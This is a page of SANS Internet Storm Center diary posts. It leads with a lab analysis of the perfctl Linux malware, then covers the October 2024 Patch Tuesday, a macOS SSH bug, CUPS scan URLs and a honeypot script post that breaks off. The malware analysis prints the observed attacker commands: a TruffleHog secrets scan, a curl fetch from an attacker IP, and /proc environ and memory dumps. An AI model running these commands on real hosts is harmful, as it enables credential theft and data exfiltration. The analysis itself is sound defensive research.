Diaries

Published: 2024-10-09

From Perfctl to InfoStealer

A few days ago, a new stealthy malware targeting Linux hosts made a lot of noise: perfctl[1]. The malware has been pretty well analyzed and I won’t repeat what has been already disclosed. I found a copy of the "httpd" binary (SHA256:22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13)[2]. I dropped the malware in my lab to see how it detonated. I infected the lab without root privileges and detected the same behavior except files were not written to some locations due to a lack of access (not root). When executing without root privileges, the rootkit feature is unavailable and the malware runs "disclosed".

After the sandbox infection, I had two running processes:

  • perfctl
  • gnome-session-binary (This name can be different and mimic well-known Linux processes)

The resources used by the two processes are:

remnux@remnux:/$ sudo lsof -p 2637
COMMAND    PID   USER   FD      TYPE             DEVICE SIZE/OFF    NODE NAME
gnome-ses 2637 remnux  cwd       DIR                8,5     4096 1967470 /var/tmp/test
gnome-ses 2637 remnux  rtd       DIR                8,5     4096       2 /
gnome-ses 2637 remnux  txt       REG                8,5  9301499 2498448 /tmp/.perf.c/gnome-session-binary (deleted)
gnome-ses 2637 remnux  mem       REG                8,5 21444668  794483 /tmp/.xdiag/tordata/cached-microdescs
gnome-ses 2637 remnux  mem       REG                8,5     3552 2245832 /usr/share/zoneinfo/America/New_York
gnome-ses 2637 remnux    0r      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    1w      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    2w      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    3u     IPv4             186838      0t0     TCP remnux:44010->tor-exit-read-me.dfri.se:http (ESTABLISHED)
gnome-ses 2637 remnux    4u  a_inode               0,14        0   12517 [eventpoll]
gnome-ses 2637 remnux    5r     FIFO               0,13      0t0   58960 pipe
gnome-ses 2637 remnux    6w     FIFO               0,13      0t0   58960 pipe
gnome-ses 2637 remnux    7u     unix 0xffff8b2abaa0dc00      0t0   71705 type=STREAM
gnome-ses 2637 remnux    8u     unix 0xffff8b2abaa09800      0t0   58991 /tmp/.xdiag/int/.per.s type=STREAM
gnome-ses 2637 remnux    9u     unix 0xffff8b2abaa0e000      0t0   71704 type=STREAM
gnome-ses 2637 remnux   10u  a_inode               0,14        0   12517 [eventpoll]
gnome-ses 2637 remnux   11r     FIFO               0,13      0t0   71706 pipe
gnome-ses 2637 remnux   12w     FIFO               0,13      0t0   71706 pipe
gnome-ses 2637 remnux   13uW     REG                8,5        0  794471 /tmp/.xdiag/tordata/lock
gnome-ses 2637 remnux   14u     IPv4              68064      0t0     TCP localhost:37959 (LISTEN)
gnome-ses 2637 remnux   15u     IPv4              71708      0t0     TCP localhost:63582 (LISTEN)
gnome-ses 2637 remnux   16u     IPv4             187544      0t0     TCP localhost:44870->localhost:46606 (ESTABLISHED)
gnome-ses 2637 remnux   17u     IPv4             187546      0t0     TCP localhost:48816->localhost:63582 (ESTABLISHED)
gnome-ses 2637 remnux   18u     IPv4             187547      0t0     TCP localhost:63582->localhost:48816 (ESTABLISHED)
gnome-ses 2637 remnux   19u     IPv4              68080      0t0     TCP remnux:42126->tor-exit.exs.no:https (ESTABLISHED)
gnome-ses 2637 remnux   20r     FIFO               0,13      0t0  187612 pipe
gnome-ses 2637 remnux   21u     IPv4              71788      0t0     TCP localhost:44870 (LISTEN)
gnome-ses 2637 remnux   22u     IPv4              71790      0t0     TCP localhost:44869 (LISTEN)
gnome-ses 2637 remnux   23w     FIFO               0,13      0t0  187612 pipe
gnome-ses 2637 remnux   24r     FIFO               0,13      0t0  187613 pipe
gnome-ses 2637 remnux   25w     FIFO               0,13      0t0  187613 pipe

remnux@remnux:/$ sudo lsof -p 2791
COMMAND  PID   USER   FD      TYPE             DEVICE SIZE/OFF    NODE NAME
perfctl 2791 remnux  cwd       DIR                8,5     4096       2 /
perfctl 2791 remnux  rtd       DIR                8,5     4096       2 /
perfctl 2791 remnux  txt       REG                8,5  1727132 2498457 /tmp/.perf.c/perfctl
perfctl 2791 remnux    0r      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    1w      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    2w      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    3u  a_inode               0,14        0   12517 [eventpoll]
perfctl 2791 remnux    4r     FIFO               0,13      0t0   68184 pipe
perfctl 2791 remnux    5w     FIFO               0,13      0t0   68184 pipe
perfctl 2791 remnux    6r     FIFO               0,13      0t0   71857 pipe
perfctl 2791 remnux    7u     unix 0xffff8b2abaa0dc00      0t0   71705 type=STREAM
perfctl 2791 remnux    8w     FIFO               0,13      0t0   71857 pipe
perfctl 2791 remnux    9u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   10u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   11u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   12r      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux   13u     IPv4             186859      0t0     TCP localhost:46606->localhost:44870 (ESTABLISHED)

That's exactly what has been described in the initial malware analysis: Tor is used for external communications and inter-process communications ate performed via sockets:

tor-exit-read-me.dfri.se:443 <-> (:42126) gnome-session-binary (127.0.0.1:46606) <-> (127.0.0.1:44870) perfctl

The malware also implants a backdoor allowing remote access to the Attacker.

Indeed, after approximately 30 minutes, I saw more activity ongoing. The Attacker dropped and executed a bunch of scripts to perform a footprint of the compromised host, search for interesting files/credentials, and exfiltrate them. All files were dropped in a sub-directory in the infected user's home directory:

remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ ls -al
total 2752
drwx------  1 remnux  remnux   32768  8 Oct 14:34 .
drwx------  1 remnux  remnux   32768  8 Oct 10:03 ..
-rwx------  1 remnux  remnux      36  8 Oct 09:26 aa.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:06 cloud_meta.txt
-rwx------  1 remnux  remnux      64  8 Oct 09:26 debug.txt
drwx------  1 remnux  remnux   32768  8 Oct 09:07 docker
-rwx------  1 remnux  remnux    7745  8 Oct 09:24 environs.txt
-rwx------  1 remnux  remnux  208084  8 Oct 09:07 files.txt
drwx------  1 remnux  remnux   32768  8 Oct 09:20 files_other
drwx------  1 remnux  remnux   32768  8 Oct 09:20 files_th
-rwx------  1 remnux  remnux       0  8 Oct 09:13 foi.cry.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:13 foi.fds.txt
-rwx------  1 remnux  remnux     612  8 Oct 09:13 foi.fs.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:24 foi.varlib.txt
-rwx------  1 remnux  remnux   29994  8 Oct 09:24 foi.xy.txt
-rwx------  1 remnux  remnux   49776  8 Oct 09:06 host.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:06 i1run1dmen
-rwx------  1 remnux  remnux    6592  8 Oct 09:06 local_users.txt
-rwx------  1 remnux  remnux    2682  8 Oct 09:06 modules.txt
-rwx------  1 remnux  remnux    3705  8 Oct 09:06 net.txt
-rwx------  1 remnux  remnux  124006  8 Oct 09:24 process.env.txt
-rwx------  1 remnux  remnux   20141  8 Oct 09:24 process.mem.txt
-rwx------  1 remnux  remnux  470494  8 Oct 14:54 rex.filepaths.large-1.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:26 rver1
-rwx------  1 remnux  remnux    2370  8 Oct 09:08 th.filesystem.secrets.found.txt

To analyze the malware behavior, I used kunai[3] to record the system activity.

The main tool downloaded is TruffleHog[4], a well-known credentials scanner that can scan many different local or remote places. The file was downloaded from the official repository:

curl -m 1800 -fsSLk hxxps://github[.]com/trufflesecurity/trufflehog/releases/download/v3.78.2/trufflehog_3.78.2_linux_amd64.tar.gz -o th.tar.gz
tar zxvf th.tar.gz trufflehog
chmod +x trufflehog
./trufflehog --help
mv trufflehog thg
xargs -0 ./thg --concurrency=2 --no-update --no-verification --include-detectors=all filesystem
rm -f thg

I'm not sure if the scan was launched automatically or by a human: Why the TruffleHog binary was executed with the "--help" parameter? Strange.

Here is the result file:

remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ cat th.filesystem.secrets.found.txt
Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:xyzzy@www.bogus.net:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 413

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:xyzzy@www.bogus.net:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 28

Found unverified result ???
Verification issue: More than one detector has found this result. For your safety, verification has been disabled.You can override this behavior by using the --allow-verification-overlap flag.
Detector Type: FTP
Decoder Type: PLAIN
Raw result: ftp://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 105

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 98

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com:3128
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 100

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 98

Found unverified result ???
Detector Type: JDBC
Decoder Type: PLAIN
Raw result: jdbc:mysql://localhost/ziclix
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py
Line: 30

Found unverified result ???
Detector Type: JDBC
Decoder Type: PLAIN
Raw result: jdbc:postgresql://localhost:5432/ziclix
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py
Line: 38

Found unverified result ???
Detector Type: Github
Decoder Type: PLAIN
Raw result: 9813cde2db1f31f92fed49a4dd8aa29b21d72581
Rotation_guide: https://howtorotate.com/docs/tutorials/github/
Version: 1
File: /opt/ghidra/Ghidra/application.properties
Line: 10

Found unverified result ???
Detector Type: Github
Decoder Type: PLAIN
Raw result: 44ca5b263a955ba19ec4f57a5646d4a406a34f70
Rotation_guide: https://howtorotate.com/docs/tutorials/github/
Version: 1
File: /opt/ghidra/Ghidra/application.properties
Line: 11

The next step was to search for interesting files using a dictionary downloaded from the following URL:

curl -m 1800 -fsSLk hxxp://104[.]183[.]100[.]189/common/backup.list -o rex.filepaths.large-1.txt

The download file contains 19K+ regular expressions to match juicy files on a file system. Example:

...
/09-managing-state/end/vue-heroes/\.env$
/0-flannel\.conf$
/0\.htpasswd$
/0loginlog$
/10-flannel\.conf$
/1C/conf$
/1C/config$
/1confirmssr\.htm$
/1\.htpasswd$
/1loginlog$
/1password$
/2004conference$
/2009-conference$
/2015/kj/config\.js$
/2019/wp-login\.php$
/2020/wp-login\.php$
/2021/wp-login\.php$
/2loginlog$
/31_structure_tests/\.env$
/3digitcode\.php$
/3loginlog$
/3-sequelize/final/\.env$
...

The Attacker searched for many regular expressions and more in the list of discovered files. Then, he/she parsed also the /proc file system for interesting processes:

ls -l /proc/1327/exe
grep -s -q KMHt5Ykyq3ZkgI8CZ /proc/1327/cmdline
grep -s -q 5Y4B2Se2L4VPL6Z5nKMgIv5Ih3+oxkb5EqmzE768BFo= /proc/1327/cmdline
cat /proc/1327/environ
cat /proc/1327/cmdline
cat /proc/1327/maps

He/she also scrapped the processes' memory for interesting data by performing multiple dumps of the memory:

dd if=/proc/1327/mem bs=4096 iflag=skip_bytes,count_bytes skip=94423105585152 count=4096

Potential dockers were also inspected:

docker images
docker ps
docker ps -a

The malware replicated itself multiple times by creating new binaries:

cp /proc/62759/exe /tmp/.perf.c/ibus-x11
cp /proc/63602/exe /tmp/.perf.c/gnome-session-ctl
cp /proc/64431/exe /tmp/.perf.c/ibus-daemon
cp /proc/65271/exe /tmp/.perf.c/ibus-x11
cp /proc/6549/exe /tmp/.perf.c/pulseaudio
cp /proc/66088/exe /tmp/.perf.c/vmtoolsd
cp /proc/66919/exe /tmp/.perf.c/ibus-daemon
cp /proc/67754/exe /tmp/.perf.c/ibus-x11
cp /proc/68583/exe /tmp/.perf.c/jq
cp /proc/69428/exe /tmp/.perf.c/systemd
cp /proc/70242/exe /tmp/.perf.c/ssh-agent
cp /proc/71046/exe /tmp/.perf.c/python3
cp /proc/71062/exe /dev/shm/libfsnldev.so
cp /proc/71062/exe /dev/shm/libpprocps.so
cp /proc/71062/exe /lib/libfsnldev.so
cp /proc/71062/exe /lib/libpprocps.so
cp /proc/7411/exe /tmp/.perf.c/systemd
cp /proc/8248/exe /tmp/.perf.c/ibus-x11
cp /proc/9084/exe /tmp/.perf.c/ibus-x11
cp /proc/9914/exe /tmp/.perf.c/systemd

Once all details are collected, they are stored in a Tar archive and exfiltrated:

trunk.6f7794aa1bd1b2b8d26eb2eae5f8df37_169.155.242.252_.tar.gz

Conclusion: If just a "simple" cryptominer seems to be deployed by Attackers, they can also steal your data and probably abuse your compromised hosts in many different ways!

[1] https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/
[2] https://www.virustotal.com/gui/file/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
[3] https://isc.sans.edu/diary/Kunai+Keep+an+Eye+on+your+Linux+Hosts+Activity/31054
[4] https://github.com/trufflesecurity/trufflehog

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2024-10-08

Microsoft Patch Tuesday - October 2024

Microsoft today released patches for 117 vulnerabilities. Three additional vulnerabilities apply to Chromium/Edge. Another three vulnerabilities are rated critical.

Five of the vulnerabilities were disclosed before today. Two vulnerabilities were not only disclosed but also exploited, according to Microsoft

Notable Vulnerabilities:

Microsoft Management Console Remote Code Execution Vulnerability (CVE-2024-43572)

To Exploit this vulnerability, the attacker must convince the victim to open a malicious file.

Open Source Curl Remote Code Execution Vulnerability (CVE-2024-6197)

This vulnerability was disclosed and patched in libcurl back in July. Accordng to curl.se, the most likely outcome is a crash, but code execution can not be ruled out.

Windows Hyper-V Security Feature Bypass Vulnerability (CVE-2024-20659)

The vulnerability allows an attacker to bypass the UEFI on the host machine and compromise the hypervisor and the secure kernel. Exploitation requires a reboot at the right time.

Windows MSHTML Platform Spoofing Vulnerability (CVE-2024-43573)

yet another Windows MSHTML Platform Spoofing vulnerability. Fourth 0-day just this year in this component. APT actors usually use these issues to make downloading and executing malware more likely.

 

 

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
.NET and Visual Studio Denial of Service Vulnerability
%%cve:2024-43485%% No No - - Important 7.5 6.5
.NET and Visual Studio Remote Code Execution Vulnerability
%%cve:2024-38229%% No No - - Important 8.1 7.1
.NET, .NET Framework, and Visual Studio Denial of Service Vulnerability
%%cve:2024-43483%% No No - - Important 7.5 6.5
%%cve:2024-43484%% No No - - Important 7.5 6.5
Azure Command Line Integration (CLI) Elevation of Privilege Vulnerability
%%cve:2024-43591%% No No - - Important 8.7 7.6
Azure Monitor Agent Elevation of Privilege Vulnerability
%%cve:2024-38097%% No No - - Important 7.1 6.2
Azure Service Fabric for Linux Remote Code Execution Vulnerability
%%cve:2024-43480%% No No - - Important 6.6 5.8
Azure Stack Hyperconverged Infrastructure (HCI) Elevation of Privilege Vulnerability
%%cve:2024-38179%% No No - - Important 8.8 7.7
BitLocker Security Feature Bypass Vulnerability
%%cve:2024-43513%% No No - - Important 6.4 5.6
BranchCache Denial of Service Vulnerability
%%cve:2024-43506%% No No - - Important 7.5 6.5
%%cve:2024-38149%% No No - - Important 7.5 6.5
Chromium: CVE-2024-7025 Integer overflow in Layout
%%cve:2024-7025%% No No - - -    
Chromium: CVE-2024-9369 Insufficient data validation in Mojo
%%cve:2024-9369%% No No - - -    
Chromium: CVE-2024-9370 Inappropriate implementation in V8
%%cve:2024-9370%% No No - - -    
Code Integrity Guard Security Feature Bypass Vulnerability
%%cve:2024-43585%% No No - - Important 5.5 4.8
DeepSpeed Remote Code Execution Vulnerability
%%cve:2024-43497%% No No - - Important 8.4 7.3
Internet Small Computer Systems Interface (iSCSI) Denial of Service Vulnerability
%%cve:2024-43515%% No No - - Important 7.5 6.5
Microsoft ActiveX Data Objects Remote Code Execution Vulnerability
%%cve:2024-43517%% No No - - Important 8.8 7.7
Microsoft Configuration Manager Remote Code Execution Vulnerability
%%cve:2024-43468%% No No - - Critical 9.8 8.5
Microsoft Defender for Endpoint for Linux Spoofing Vulnerability
%%cve:2024-43614%% No No - - Important 5.5 4.8
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2024-43504%% No No - - Important 7.8 6.8
Microsoft Management Console Remote Code Execution Vulnerability
%%cve:2024-43572%% Yes Yes - - Important 7.8 7.2
Microsoft Office Remote Code Execution Vulnerability
%%cve:2024-43576%% No No - - Important 7.8 6.8
%%cve:2024-43616%% No No - - Important 7.8 6.8
Microsoft Office Spoofing Vulnerability
%%cve:2024-43609%% No No - - Important 6.5 5.7
Microsoft Office Visio Remote Code Execution Vulnerability
%%cve:2024-43505%% No No - - Important 7.8 6.8
Microsoft OpenSSH for Windows Remote Code Execution Vulnerability
%%cve:2024-43581%% No No - - Important 7.1 6.2
%%cve:2024-43615%% No No - - Important 7.1 6.2
%%cve:2024-38029%% No No - - Important 7.5 6.5
Microsoft SharePoint Elevation of Privilege Vulnerability
%%cve:2024-43503%% No No - - Important 7.8 6.8
Microsoft Simple Certificate Enrollment Protocol Denial of Service Vulnerability
%%cve:2024-43541%% No No - - Important 7.5 6.5
%%cve:2024-43544%% No No - - Important 7.5 6.5
Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability
%%cve:2024-43574%% No No - - Important 8.3 7.2
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
%%cve:2024-43519%% No No - - Important 8.8 7.7
Microsoft Windows Storage Port Driver Elevation of Privilege Vulnerability
%%cve:2024-43560%% No No - - Important 7.8 6.8
NT OS Kernel Elevation of Privilege Vulnerability
%%cve:2024-43553%% No No - - Important 7.4 6.4
Open Source Curl Remote Code Execution Vulnerability
%%cve:2024-6197%% Yes No - - Important 8.8 7.7
Outlook for Android Elevation of Privilege Vulnerability
%%cve:2024-43604%% No No - - Important 5.7 5.0
Power BI Report Server Spoofing Vulnerability
%%cve:2024-43481%% No No - - Important 6.5 5.7
%%cve:2024-43612%% No No - - Important 6.9 6.0
Remote Desktop Client Remote Code Execution Vulnerability
%%cve:2024-43533%% No No - - Important 8.8 7.7
%%cve:2024-43599%% No No - - Important 8.8 7.7
Remote Desktop Protocol Server Remote Code Execution Vulnerability
%%cve:2024-43582%% No No - - Critical 8.1 7.1
Remote Registry Service Elevation of Privilege Vulnerability
%%cve:2024-43532%% No No - - Important 8.8 7.7
Sudo for Windows Spoofing Vulnerability
%%cve:2024-43571%% No No - - Important 5.6 4.9
Visual C++ Redistributable Installer Elevation of Privilege Vulnerability
%%cve:2024-43590%% No No - - Important 7.8 6.8
Visual Studio Code extension for Arduino Remote Code Execution Vulnerability
%%cve:2024-43488%% No No - - Critical 8.8 7.7
Visual Studio Code for Linux Remote Code Execution Vulnerability
%%cve:2024-43601%% No No - - Important 7.1 6.2
Visual Studio Collector Service Denial of Service Vulnerability
%%cve:2024-43603%% No No - - Important 5.5 4.8
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
%%cve:2024-43563%% No No - - Important 7.8 6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2024-43501%% No No - - Important 7.8 6.8
Windows Cryptographic Information Disclosure Vulnerability
%%cve:2024-43546%% No No - - Important 5.6 4.9
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2024-43509%% No No - - Important 7.8 6.8
%%cve:2024-43556%% No No - - Important 7.8 6.8
Windows Graphics Component Information Disclosure Vulnerability
%%cve:2024-43508%% No No - - Important 5.5 4.8
%%cve:2024-43534%% No No - - Important 6.5 5.7
Windows Hyper-V Denial of Service Vulnerability
%%cve:2024-43521%% No No - - Important 7.5 6.5
%%cve:2024-43567%% No No - - Important 7.5 6.5
%%cve:2024-43575%% No No - - Important 7.5 6.5
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2024-30092%% No No - - Important 8.0 7.0
Windows Hyper-V Security Feature Bypass Vulnerability
%%cve:2024-20659%% Yes No - - Important 7.1 6.6
Windows Kerberos Elevation of Privilege Vulnerability
%%cve:2024-38129%% No No - - Important 7.5 6.5
Windows Kerberos Information Disclosure Vulnerability
%%cve:2024-43547%% No No - - Important 6.5 5.7
Windows Kernel Denial of Service Vulnerability
%%cve:2024-43520%% No No - - Important 5.0 4.4
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2024-43502%% No No - - Important 7.1 6.2
%%cve:2024-43527%% No No - - Important 7.8 6.8
%%cve:2024-37979%% No No - - Important 6.7 5.8
%%cve:2024-43511%% No No - - Important 7.0 6.1
%%cve:2024-43570%% No No - - Important 6.4 5.6
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
%%cve:2024-43535%% No No - - Important 7.0 6.1
Windows Kernel-Mode Driver Information Disclosure Vulnerability
%%cve:2024-43554%% No No - - Important 5.5 4.8
Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability
%%cve:2024-43522%% No No - - Important 7.0 6.1
Windows MSHTML Platform Spoofing Vulnerability
%%cve:2024-43573%% Yes Yes - - Moderate 6.5 6.0
Windows Mobile Broadband Driver Denial of Service Vulnerability
%%cve:2024-43537%% No No - - Important 6.5 5.7
%%cve:2024-43538%% No No - - Important 6.5 5.7
%%cve:2024-43540%% No No - - Important 6.5 5.7
%%cve:2024-43542%% No No - - Important 6.5 5.7
%%cve:2024-43555%% No No - - Important 6.5 5.7
%%cve:2024-43557%% No No - - Important 6.5 5.7
%%cve:2024-43558%% No No - - Important 6.5 5.7
%%cve:2024-43559%% No No - - Important 6.5 5.7
%%cve:2024-43561%% No No - - Important 6.5 5.7
Windows Mobile Broadband Driver Remote Code Execution Vulnerability
%%cve:2024-43525%% No No - - Important 6.8 5.9
%%cve:2024-43526%% No No - - Important 6.8 5.9
%%cve:2024-43543%% No No - - Important 6.8 5.9
%%cve:2024-43523%% No No - - Important 6.8 5.9
%%cve:2024-43524%% No No - - Important 6.8 5.9
%%cve:2024-43536%% No No - - Important 6.8 5.9
Windows Netlogon Elevation of Privilege Vulnerability
%%cve:2024-38124%% No No - - Important 9.0 7.8
Windows Network Address Translation (NAT) Denial of Service Vulnerability
%%cve:2024-43562%% No No - - Important 7.5 6.5
%%cve:2024-43565%% No No - - Important 7.5 6.5
Windows Online Certificate Status Protocol (OCSP) Server Denial of Service Vulnerability
%%cve:2024-43545%% No No - - Important 7.5 6.5
Windows Print Spooler Elevation of Privilege Vulnerability
%%cve:2024-43529%% No No - - Important 7.3 6.4
Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
%%cve:2024-38262%% No No - - Important 7.5 6.5
Windows Remote Desktop Services Tampering Vulnerability
%%cve:2024-43456%% No No - - Important 4.8 4.2
Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability
%%cve:2024-43514%% No No - - Important 7.8 6.8
Windows Resilient File System (ReFS) Information Disclosure Vulnerability
%%cve:2024-43500%% No No - - Important 5.5 4.8
Windows Resume Extensible Firmware Interface Security Feature Bypass Vulnerability
%%cve:2024-37976%% No No - - Important 6.7 5.8
%%cve:2024-37982%% No No - - Important 6.7 5.8
%%cve:2024-37983%% No No - - Important 6.7 5.8
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2024-38261%% No No - - Important 7.8 6.8
%%cve:2024-43608%% No No - - Important 8.8 7.7
%%cve:2024-43607%% No No - - Important 8.8 7.7
%%cve:2024-38265%% No No - - Important 8.8 7.7
%%cve:2024-43453%% No No - - Important 8.8 7.7
%%cve:2024-38212%% No No - - Important 8.8 7.7
%%cve:2024-43549%% No No - - Important 8.8 7.7
%%cve:2024-43564%% No No - - Important 8.8 7.7
%%cve:2024-43589%% No No - - Important 8.8 8.1
%%cve:2024-43592%% No No - - Important 8.8 7.7
%%cve:2024-43593%% No No - - Important 8.8 7.7
%%cve:2024-43611%% No No - - Important 8.8 7.7
Windows Scripting Engine Security Feature Bypass Vulnerability
%%cve:2024-43584%% No No - - Important 7.7 6.7
Windows Secure Channel Spoofing Vulnerability
%%cve:2024-43550%% No No - - Important 7.4 6.4
Windows Secure Kernel Mode Elevation of Privilege Vulnerability
%%cve:2024-43516%% No No - - Important 7.8 6.8
%%cve:2024-43528%% No No - - Important 7.8 6.8
Windows Shell Remote Code Execution Vulnerability
%%cve:2024-43552%% No No - - Important 7.3 6.4
Windows Standards-Based Storage Management Service Denial of Service Vulnerability
%%cve:2024-43512%% No No - - Important 6.5 5.7
Windows Storage Elevation of Privilege Vulnerability
%%cve:2024-43551%% No No - - Important 7.8 6.8
Windows Telephony Server Remote Code Execution Vulnerability
%%cve:2024-43518%% No No - - Important 8.8 7.7
Winlogon Elevation of Privilege Vulnerability
%%cve:2024-43583%% Yes No - - Important 7.8 6.8

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2024-10-07

macOS Sequoia: System/Network Admins, Hold On!

It's always tempting to install the latest releases of your preferred software and operating systems. After all, that's the message we pass to our beloved users: "Patch, patch, and patch again!". Last week, I was teaching for SANS and decided to not upgrade my MacBook to macOS 15.0 (Sequoia). Today, I had nothing critical scheduled and made the big jump. Upgrading the operating system is always stressful but everything ran smoothly. So far so good...

Later, I started to do my regular geek tasks and connected to several SSH hosts. After a random amount of time, I noticed the following error for many connections:

ssh_dispatch_run_fatal: Connection to x.x.x.x port 22: Connection corrupted

This happened multiple times. I started to google for some users' feedback and experiences. It seems to be a problem faced by many people. What I've read:

  • It happens randomly
  • It affects IPv4 / IPv6
  • Not related to an SSH client (term, iTerm2, same)
  • People who upgraded to 15.0.1 have less frequent disconnections but the problem is not solved yet
  • Some recommendations (worked for some users)
    • Disable the macOS firewall
    • Turn off "Limit IP address tracking
    • Disable private rotating MAC
    • Disable tools like LittleSnitch

There is no "magic recipe" to fix the issue. On my Mac, disabling the address tracking did the job. I've now an SSH session open for 2h+.

Many forums are covering this topic. The most complete one I found is on the Apple support forum[1]. In conclusion, if SSH is a critical protocol for you, maybe hold on before upgrading your macOS.

Tip: If you need to SSH to a host, be sure to start your shell in a "screen" (or Byobu, ... ) session[2] to not lose your work.

[1] https://discussions.apple.com/thread/255761702?sortBy=rank&page=1
[2] https://ss64.com/bash/screen.html

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2024-10-04

Survey of CUPS exploit attempts

It is about a week since the release of the four CUPS remote code execution vulnerabilities. After the vulnerabilities became known, I configured one of our honeypots that watches a larger set of IPs to specifically collect UDP packets to port 631. Here is a quick summary of the results.

We do see plenty of scanning to enumerate vulnerable systems, but at this point, no evidence of actual exploitations. But the honeypot is not responding to these requests, so we may be missing post-recon attempts to exploit the vulnerability

Top URLs

http://192.34.63.88:5674/printers/securitytest3/

The website is down now, but used to show a message that this is a scan to evaluate systems for research purposes. We do no t have a prior history from this IP address.

http://194.113.74.187:631/printers/amongus

Also no longer responding. The IP address is associated with security researcher Bill Demirkapi.

http://80.94.95.85:65000/printers/YmVuaWduYmUK "location_field" "info_field"

The string at the end of the URL decoded to "benignbe". The IP address was first seen last August scanning for various ports. The URL is no longer responding.

http://34.176.139.243/printers/YmVuaWducHJpbnRlcnMK "location_field" "info_field"

Note the similar base64 encoded string. This one decoded to "benignprinters". 

http://t828r8qoegavzdeaqtn5jd9umlsdg34s.oastify.com/printers/research_cups_if_we_find_you_are_vulnerable_we_will_let_you_know_via_responsible_disclosure

The URL hopefully identifies the purpose of the scan correctly :) . Oastify.com is used by the Burp collaboration server.

http://172.214.128.90:65000/printers/YmVuaWduYmUK "location_field" "info_field"

Another "benignbe" URL. Interestingly a Microsoft/GitHub IP address.

http://87.236.176.146:631/classes/2ef46bd9-ae8f4743 (and similar URLs with varying random end)

This IP is associated with internet-measurement.com.

So far, I only saw two "ipp" URLs:

ipp://146.70.100.229:80/printers/ "XXlocation" "XXinfo" "XXmake-and-model"

and 

ipp://199.247.0.94:631/printers/test

I will try to setup some automated responses soon to get a bit more detail.

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2024-10-03

Kickstart Your DShield Honeypot [Guest Diary]

[This is a Guest Diary by Joshua Gilman, an ISC intern as part of the SANS.edu BACS program]

Introduction

Setting up a DShield honeypot is just the beginning. The real challenge lies in configuring all the necessary post-installation settings, which can be tedious when deploying multiple honeypots. Drawing from personal experience and valuable feedback from past interns at the Internet Storm Center (ISC), I developed DShieldKickStarter to automate this often repetitive and time-consuming process.

What is DShieldKickStarter?

DShieldKickStarter is not a honeypot deployment tool. Instead, it’s a post-installation configuration script designed to streamline the setup of a honeypot environment after the DShield honeypot software has been installed. The script ensures that honeypots run efficiently with minimal manual effort by automating essential tasks such as setting up log backups, PCAP capture, and installing optional analysis tools.

Key Features of DShieldKickStarter

•    Automated Log Backups: The script organizes, compresses, and password-protects honeypot logs to prevent accidental execution of malicious files.
•    PCAP Capture Setup: Using tcpdump, it captures network traffic while excluding specific ports, ensuring relevant data is logged.
•    Optional Tool Installation: Cowrieprocessor and JSON-Log-Country are included as optional tools. Both were invaluable during my internship for streamlining data analysis.
•    Helpful for Multiple Honeypots: This script is handy when managing several honeypots. It saves time by automating repetitive setup tasks.

Step-by-Step Breakdown

The script automates several critical tasks:
1.    Creating Directories and Setting Permissions 
